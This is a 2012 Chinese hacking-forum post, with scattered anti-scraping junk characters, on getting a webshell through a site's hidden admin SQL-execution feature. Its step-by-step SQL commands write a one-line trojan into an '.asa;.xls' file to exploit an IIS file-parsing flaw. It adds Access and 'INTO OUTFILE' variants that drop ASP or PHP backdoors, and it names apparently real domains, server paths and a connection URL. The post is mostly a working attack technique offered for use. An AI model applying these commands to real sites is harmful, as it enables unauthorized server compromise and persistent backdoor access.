好不容易进了后台,发现啥上传啊。备份啊多木有。; S+ M& |- Z5 p1 D, I
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
) f" Z6 ~0 m0 e: [9 H+ R* a$ G, P' ~文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
0 i) x8 _$ p* ^1 L+ B% R& _# I然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:0 w* R w" {/ z& d2 X1 J- K
1.create table cmd (a varchar(50))
3 {) _) T& @: p) E2.insert into cmd (a) values (‘‘). M2 m! @ y$ q u& ~7 }; a) c2 S
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd/ p* d8 a' v, O# q
(把表cmd的内容导出为物理路径的一个EXCEL文件)8 Q$ Q ?0 ]( E0 E0 ]
4.drop table cmd. @+ L4 ^2 S% ?/ i
利用IIS的BUG成功拿到了WEBSHELL。) e! b a2 Q l- `
) h7 a6 e8 e) {. t6 a# J' W
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
+ n. K0 G+ `# ]% _3 k' @% v! g
8 e, g, x9 P4 t3 w( f SQL语句意思解释:2 r& `* ]4 ^ t
第一句
. A: C% `: O, f1 t% i. A 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为500 v4 P% p: K0 p+ W; K
5 _: S/ v" s) U$ [3 ^
第二句4 S( ?& w" |( I, c
在表cmd的a字段插入一句话木马
5 B% H: ?: n' N 第三句. ^: E; ?8 Z5 y: T( I5 v
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件2 Y7 ~2 w9 X9 C6 v: N0 N
! E& W* z. o9 @! Q) V! H( L$ x
第四句
1 C$ z' V! W' m' [6 n 删除建立的cmd表
# v m* h9 d, l P3 Y+ ^3 M+ y& @! F& T( l# V7 ?# c- Z, D
以下内容为测试:5 K6 h6 W5 L: N7 B/ `- R
Access利用后台SQL执行命令功能导出WebShell:
4 Z; u& n$ M: S4 a2 P 这个更简单:# T6 V2 p2 L- K E
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
' N. N2 n3 h& g& o. Y( e3 p 或者
1 x3 o& x0 ]! Y2 b1 P [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]5 A/ _/ Q5 n! f: U4 V8 F" l0 `
* ~! l0 W' S1 z7 C( B4 s
后台有执行SQL语句功能(vote为已知表段)
( D7 s+ C4 }5 w. {! J" p" o4 p8 A6 T 希望对大家有所帮助拿shell的又一个思路
6 x2 {. w; ^1 V: ]4 A: q |
发表于 2012-9-13 17:53:58
收藏
分享
支持
反对